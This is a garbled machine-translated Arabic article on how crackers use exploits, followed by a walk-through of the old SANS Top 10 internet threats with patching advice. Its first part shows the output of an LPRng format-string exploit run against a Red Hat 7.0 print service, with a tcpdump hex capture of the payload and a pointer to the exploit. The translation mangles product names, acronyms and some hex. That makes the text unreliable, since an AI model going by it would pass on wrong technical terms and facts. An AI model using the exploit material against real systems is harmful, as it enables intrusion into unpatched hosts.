بلا حدود عليا (10) ، واستغل تديرها المفرقعات

في هذه المادة ، نحن سيغطي مآثر تديرها المفرقعات. وسنقوم ايضا انظروا بلا حدود 10 احرج الانترنت التهديدات الامنية القائمة.

مآثر

استطلاع أمر حيوي في اعتقاد ما هي مفتوحة ومغلقة ما. الخطوة التالية لالمفرقع هو فعلا لكسر في شبكة حاسوبيه. المفرقعات يفعل هذا عن طريق استغلال نقاط الضعف في نظم التشغيل والخدمات.

وهناك العديد من مآثر الى هناك ؛ العثور على الحق في استغلال يمكن ان يكون صداع. لم يستغل جميع خلقوا متساوين. هذا من جانب ، يعني ان معظم مآثر هي التي تعتمد نظام التشغيل. لمجرد ان ثمة خط الطابعه استغلال لينكس لا يعنى انها ستعمل على سولاريس ، والعكس بالعكس.

للمساعدة في شرح ما هو وجود استغلال يشبه عندما يتم تنفيذه ، فقد أدرجت في هذه المادة الناتج من استغلال بعض العبوات ، والمشاركة في استغلال. أولا ، قليلا معلومات اساسية عن استغلال انني قررت البعيد. في أواخر عام 2000 ، وازداد النشاط بحث عن بورت 515 (خط الطابعه الميناء). هذا له علاقة استغلال وجود في القبعه الحمراء 7.0 خط الطابعه شيطان. وفي وقت كتابة هذا التقرير ، وانا لا يزال يشهد العديد من مسابر لهذه الخدمة على بلدي جدار ناري.

اذا كنت تريد ان ترى استغلال كنت ، ويمكن الاطلاع عليه في http://www.netcat.it.

هنا هي قوائم وعد جنبا الى جنب مع بعض لعب بها اللعب من اجل كل :

  + + + Www.netcat.it الناءيه لاستغلال lprng / شعبه المكتبه والمنشورات 

  + + + استغلال المعلومات 

  + + + الضحيه : 192.168.1.25 

  + + + نوع : 0 - redhat 7.0 - guinesss 

  + + + المقاولين العنوان : 0xbffff3ec 

  + + + Shellcode العنوان : 0xbffff7f2 

  + + + الموقف : 300 

  + + + الاتساق : 2 

  + + + يعوض 0 

  + + + مهاجمة 192.168.1.25 مع شركائنا في شكل سلسلة 

  + + + القوة الغاشمه رجل ، الاسترخاء والتمتع الركوب ؛ > 

من هذا الناتج ، ونحن نعلم ان تستغل هو مهاجمة احمر قبعة 7.0 خط الطابعه (نوع 0 - redhat7.0 - guinesess). نريد ان نرى كيف tcpdump آراء هذا الهجوم؟

  18:34:19.991789> 192.168.1.5.2894> 192.168.1.25.printer : ق 4221747912:4221747912 (0) الفوز 

  32120 <mss1460،sackok،timestamp 4058996 0،nop،wscale 0> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 11263) 

  003c 2bff 4500 4000 4006 0105 8b4e c0a8 

  C0a8 0b4e 0119 0203 0000 0000 fba2 c2c8 

  A002 7d78 8bb1 0000 0204 0402 080a 05b4 

  003 د ef74 0000 0000 0103 0300 

  18:34:19.993434 <192.168.1.25.printer> 192.168.1.5.2894 : ق 397480959:397480959 (0) يقر 

  4221747913 فوز 32120 <mss1460،sackok،timestamp 393475 4058996،nop،wscale 0> (العاصمة) (64 وقت ابقاء الاتصال ، 

  معرف 3278) 

  003c 0cce 4500 4000 4006 0119 aa7f c0a8 

  C0a8 0105 0203 17b1 0b4e 13ff fba2 c2c9 

  A012 7d78 5ee7 0000 0204 0402 080a 05b4 

  003d ef74 0006 0103 0103 0300 

  18:34:19.993514> 192.168.1.5.2894> 192.168.1.25.printer :.  1:1 (0) 1 يقر فوز 32120 <21/79 ، 

  21/79 ، وختم الوقت 4058996 393475> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 11264) 

  4500 0034 4000 4006 8b55 2c00 c0a8 0105 

  0b4e c0a8 0119 0203 17b1 1400 fba2 c2c9 

  7d78 8dac 8010 0000 0101 080a 003d ef74 

  0006 0103 

  18:34:19.999662 <192.168.1.25.printer> 192.168.1.5.2894 : ف 1:31 (30) 1 يقر فوز 32120 

  <21/79 ، 21/79 ، وختم الوقت 393476 4058996> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 3279) 

  0ccf 4500 0052 4000 4006 0119 aa68 c0a8 

  C0a8 0105 0203 17b1 1400 0b4e fba2 c2c9 

  7d78 3e5b 8018 0000 0101 0006 0104 080a 

  003 د ef74 6c70 643a الشرط 204d 616c 666f 

  726 د 726f 6d20 6564 2066 6164 6472 6573 

  730 أ 

  18:34:19.999686> 192.168.1.5.2894> 192.168.1.25.printer :.  1:1 (0) 31 يقر فوز 32120 <21/79 ، 

  21/79 ، وختم الوقت 4058997 393476> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 11265) 

  4500 0034 4000 4006 8b54 2c01 c0a8 0105 

  0b4e c0a8 0119 0203 17b1 fba2 c2c9 141e 

  7d78 8d8c 8010 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.000863 <192.168.1.25.printer> 192.168.1.5.2894 : و 31:31 (0) 1 يقر فوز 32120 

  <21/79 ، 21/79 ، وختم الوقت 393476 4058997> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 3280) 

  0cd0 4500 0034 4000 4006 0119 aa85 c0a8 

  C0a8 0105 0203 17b1 0b4e 141e fba2 c2c9 

  8d8b 7d78 8011 0000 0101 0006 0104 080a 

  003 د ef75 

  18:34:20.000878> 192.168.1.5.2894> 192.168.1.25.printer :.  1:1 (0) 32 يقر فوز 32120 <21/79 ، 

  21/79 ، وختم الوقت 4058997 393476> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 11266) 

  4500 0034 4000 4006 8b53 2c02 c0a8 0105 

  0b4e c0a8 0119 0203 17b1 fba2 c2c9 141f 

  8d8b 7d78 8010 0000 0101 080a 003d ef75 

  0006 0104 

  18:34:20.049095> 192.168.1.5.2894> 192.168.1.25.printer : ف 1:424 (423) يقر 32 فوز 32120 

  <21/79 ، 21/79 ، وختم الوقت 4059002 393476> (العاصمة) (وقت ابقاء الاتصال 64 ، رقم تعريف 11267) 

  01db 2c03 4500 4000 4006 0105 89ab c0a8 

  0b4e c0a8 0119 0203 17b1 fba2 c2c9 141f 

  7d78 54c5 8018 0000 0101 080a 003d ef7a 

  0006 0104 4242 f0ff ffbf f1ff ffbf f2ff 

  Ffbf f3ff ffbf 5858 5858 5858 5858 5858 

  5858 5858 5858 5858 3137 3675 2533 252e 

  246e 252e 3030 3133 7525 3330 3124 6e25 

  2 ع 3533 7525 3330 3224 3932 6e25 2e31 

دعونا ننظر الى ما يحدث هنا. اولا ، نرى 192.168.1.5 و192.168.1.25 محاولة لجعل علاقة باستخدام برنامج التعاون التقني النمطيه ثلاثي المصافحه. في تسلسل الاحداث المقبلة ، ونحن نرى 192.168.1.5 محاولة لخوض استغلال ضد 192.168.1.25. واخيرا ، نرى 192.168.1.5 دفع 423 بايت من البيانات الى 192.168.1.25. فان هذا لا تزال تستغل لفترة لحين انها قادرة على القوة الغاشمه - فإن استغلال.

عندما عملت في استغلال هذا ، 192.168.1.25 قدمت لي مع شركة شل (أنني لا يحتاج اليها احد) ، وانا يمكن ان تفعل ما اردت من اي وقت مضى.

استغل هي السبيل المفرقعات اقتحام النظم. حمايه نفسك ضدها ، سيتعين عليكم قم بتحديث نظام التشغيل مع الرقع. (وهذا ينطبق على جميع النظم.)

فان بلا حدود عليا 10

فان بلا حدود عليا 10 أهم التهديدات الامنية على الانترنت هي قائمة الأكثر شيوعا مآثر العثور على الشبكات الحاسوبيه. ما الذي يجعل هذه القائمة حتى قيما هو حقيقة ان نظام الادارة مجموعة شبكة الامن يقدم قائمة من الادخالات المتعلقة cve (مشترك مواطن الضعف والتعرض) ، بحيث ان اي شخص يمكن ان تفعله اذا كان من الضروري اجراء المزيد من البحوث. وهذه القائمة التي جمعتها مع بلا حدود بمساعدة العديد من خبراء الامن والامن للمجتمع.

فان cve قاعدة البيانات ويمكن الاطلاع على http://www.cve.mitre.org/.

لقراءة المزيد عن بلا حدود عليا 10 ، زيارة http://www.sans.org/topten.htm.

الاولى استغلال المدرجه على رأس 10 هو الزام. الزام هو برنامج يستخدم لخدمة دياناس) للمساعدة في حل الاسماء الى عناوين) ويستخدم في جميع انحاء الانترنت. في السنوات القليلة الماضية ، وقد الرئيسية الثقوب الموجودة في العديد من النسخ من الزام. ومن الأمور الحيويه بالنسبة لاى شخص مخالف لتربط دائما على مجاراه احدث الضعف. وفي 29 كانون الثاني / يناير ، 2001 ، شبكة شركاء ادرجت اعلنت انها اكتشفت اكثر نقاط الضعف المتعلقة بالزام النسخه 4 وتجليد النسخه 8. الرقع قد اطلق سراحهم ويمكن تحميل نظام التشغيل الخاص بك من البائع على شبكة الانترنت.

اذا اردت ان تقرأ هذه الورقه صادر ناي ، يمكنك الحصول عليه هنا : http://www.pgp.com/aboutus/press/pr_template.asp؟pr=/pressmedia/01282001-a.asp&sel = 900 او يمكنك قراءة CERT الاستشاريه في http://www.cert.org/advisories/ca-2001-02.html.

الثاني في استغلال بلا حدود قصوى هي 10 ضعفا CGI البرامج. لقد كانت هذه السنوات وحولها لهي السبب الرئيسي لمعظم المأجور المواقع على شبكة الانترنت التي تتلقى صلب الاهتمام.

وكثير من هذه CGI - بن برامج اجازة عينه بعد تركيب البرامج التي الضعيفه وكيديه تسمح للمستخدم الحصول على "جذور" الوصول. عندما تحصل المهاجم من الوصول الى هذا المستوى ، ان بامكانه ان يفعل ما قال انه يرضى (تشمل تغيير الموقع). انني قدمت بعض وصلات للحصول على مزيد من المعلومات عن CGI - بن الهجمات. هذه القائمة ليست شاملة ؛ الرجاء حفر قليلا اذا كنت تظن انك الضعيفه.

مزيد من المعلومات يمكن الاطلاع على CGI - بن لهجمات من http://www.cert.org/advisories/ca-1997-24.html ، http://www.cert.org/advisories/ca-1996-11.html ، او http://www.cert.org/advisories/ca-1997-07.html.

الثالث هو استغلال الضعفاء الناءيه الاجراء يدعو (rpcs). Rpcs تسمح ج برامج لجعل الاجراء يدعو آلات اخرى عبر الشبكه. معظم البائعين للمساعدة على توفير رقع تشديد تراجع الخدمات للجنة الحمايه من الاشعاع. ومع ذلك ، فان افضل سياسة بشأن هذه الخدمة ، اذا كنت لا يحتاجون اليه ، ثم انه قتل. يمكنك تشغيل تبسيط العمليات - ع أ | grep جنة الحمايه من الاشعاع ، تجد عملية معرف (رمز المهمة) ، ثم شغل وتقتل -9 رمز المهمة. يمكنك ايضا تعطيل الخدمات للجنة الحمايه من الاشعاع في البداية على معظم نظم التشغيل يونيكس البدء بتغيير الملف (الموجود فى / الخ / rc.d / (من ق (البدء) ك (قتل). يمكنك ان تعرف ما هي برامج ادارة للجنة الحمايه من الاشعاع باستخدام rpcinfo - ف.

مزيد من المعلومات يمكن الاطلاع على الهجمات من http://www.cert.org/incident_notes/in-99-04.html جنة الحمايه من الاشعاع.

الرابع استغلال بلا حدود على رأس قائمة هو 10 ضعفا بيانات الاستشعار عن بعد فى خدمة الامن الثقوب IIS. (ان نكون صادقين ، وانا فوجئت مايكروسوفت ليس لديها مزيد من الضعف في رأس 10). واستطيع ان الخص التعامل مع هذا الواقع استغلال التصحيح السريع... IIS الخاص بك.

مزيد من المعلومات يمكن الاطلاع على طلقة الامن الثقوب من http://www.wiretrip.net/rfp/p/doc.asp؟id=29&iface=2.

الخامسة هي استغلال الضعفاء sendmail وتمثيليه صامتة الهجمات. هذه هي نقاط الضعف المتصله عازلة الفيضانات فضلا عن انبوب الهجمات التي تمكن الجذريه الفوريه وسطا. وهناك بضعة طرق لتأمين هذه المشكلة المجالات. الاول هو الحفاظ على الرقع الصحيح لجهودكم sendmail / خدمة البريد. اذا كنت لا تحتاج الى تشغيل اي من هذه الخدمات ، يمكنك تعطيلها) تتبع نفس الاجراءات على النحو المنصوص عليه لجنة الحمايه من الاشعاع).

مزيد من المعلومات يمكن الاطلاع على sendmail الامن الثقوب من http://www.cert.org/advisories/ca-97.05.sendmail.html.

السادسه هو استغلال الضعفاء وsadmind mountd. وينطبق هذا الضعف لينكس الآلات وكذلك آلات سولاريس.

للمزيد من المعلومات حول sadmind وmountd الامن الثقوب ، أو زيارة http://www.cert.org/advisories/ca-99-16-sadmind.html http://www.cert.org/advisories/ca-1998.12 . Mountd.html.

السابع في استغلال أكبر 10 هو ملف تقاسم العالمية ، واستخدام الموانئ netbios 135-139). هذا هو على الارجح اكبر مشكلة امنية المستخدمون اذا كانت ترتبط برقية مودم أو خط الهاتف الرقمي للاتصالات. معظم لا افهم مفهوم ملف تقاسم وترك ملف تقاسم مكن. وهناك مشكلة اخرى تتمثل نابستار. ورغم ان نابستار لا ترد هنا ، هل تحتاج إلى نصيب الشعب وادلة يمكن ان تؤدي الى تقاسم اكثر ثم لزم الامر. كيف يمكننا تصحيحه؟ وهذه الاقتراحات هي من موقع http://www.sans.org/topten.htm بلا حدود :

الف - تقاسم عندما شنت حملات ، وضمان ألا يتم تقاسم الادله المطلوبة.

باء - لالمضافه الامن ، والسماح فقط لتقاسم محددة عناوين بروتوكول انترنت لأن دياناس اسماء يمكن مغشوش.

جيم - لأنظمة ويندوز ، وضمان حمايه جميع الاسهم القويه مع كلمات السر.

دال - لانظمة ويندوز NT ، ومنع مجهول تعداد المستخدمين ، والمجموعات ، وتشكيل نظام السجل مفاتيح عبر برنامج "لاغيه والخمسين" الصدد.

كتلة الداخل وصلات إلى netbios الدورة الخدمة (139 مشاريع التعاون التقني) في مسار أو NT المضيفه. النظر في تنفيذ restrictanonymous قلم الرئيسية لشبكة الانترنت - في علاقة تستضيف مستقل او عدم ثقته في مجال البيئات.

الثامن هو استغلال ضعف كلمات السر. انا اقول اي حاجة اكثر؟ في اي شكل من اشكال تقييم المخاطر ، واحدة من نقاط الضعف الأكثر شيوعا الذي أراه هو ضعف كلمات السر. عند الخروج مع كلمة سر ، لنتذكر ان تتبع هذه المبادئ التوجيهيه بسيطة :

- التأكد من ان كلمة السر هي ثمانيه احرف.

- التأكد من ان كلمة السر هي مزيج من ارقام ، حروف خاصة ، وحرف ابجدي - رقمي.

- اختيار كلمة سر ليست في القاموس.

للمزيد من المعلومات حول كلمة سر قوتهم وزيارة http://www.cert.org/tech_tips/passwd_file_protection.html.

التاسعه هو استغلال وترحيل الفائض البوب عازلة الضعف او غير صحيحة التشكيل. ومرة اخرى ، فان افضل طريقة لتأمين نفسك من هذه الهجمات هو لتعطيل هذه الخدمة اذا كنت لا يحتاجون إليه. ايضا ، وتطبيق احدث الرقع (اذا كنت بحاجة لتشغيل الخدمة).

للمزيد من المعلومات حول ترحيل والبوب الامن يرجى زيارة http://www.cert.org/advisories/ca-1998.09.imapd.html ، http://www.cert.org/advisories/ca-1998.08. Qpopper_vul.html ، او http://www.cert.org/advisories/ca-1997.09.imap_pop.html.

النهائي في استغلال بلا حدود عليا 10 الافتراضي هو مجتمع قيود او تجميعيه لمجموعة "العام" و "الخاص". جنبا الى جنب مع كلمات سر ضعيفة ، وهذا الضعف يمكن ان تسيطر عليها الادارة الاساسية.

للمزيد من المعلومات حول تجميعيه وقيود المجتمع ، انظر http://www.cisco.com/univercd/cc/td/doc/cisintwk/ito_doc/snmp.htm # xtocid210315.

نضع في اعتبارنا ان هذه الحقوق ليست سوى الضعف على الشبكه. أ المفرقع يمكن استخدام اى استغلال لديه في بلده كيس من الخدع ضدكم والشبكه الخاصة بك.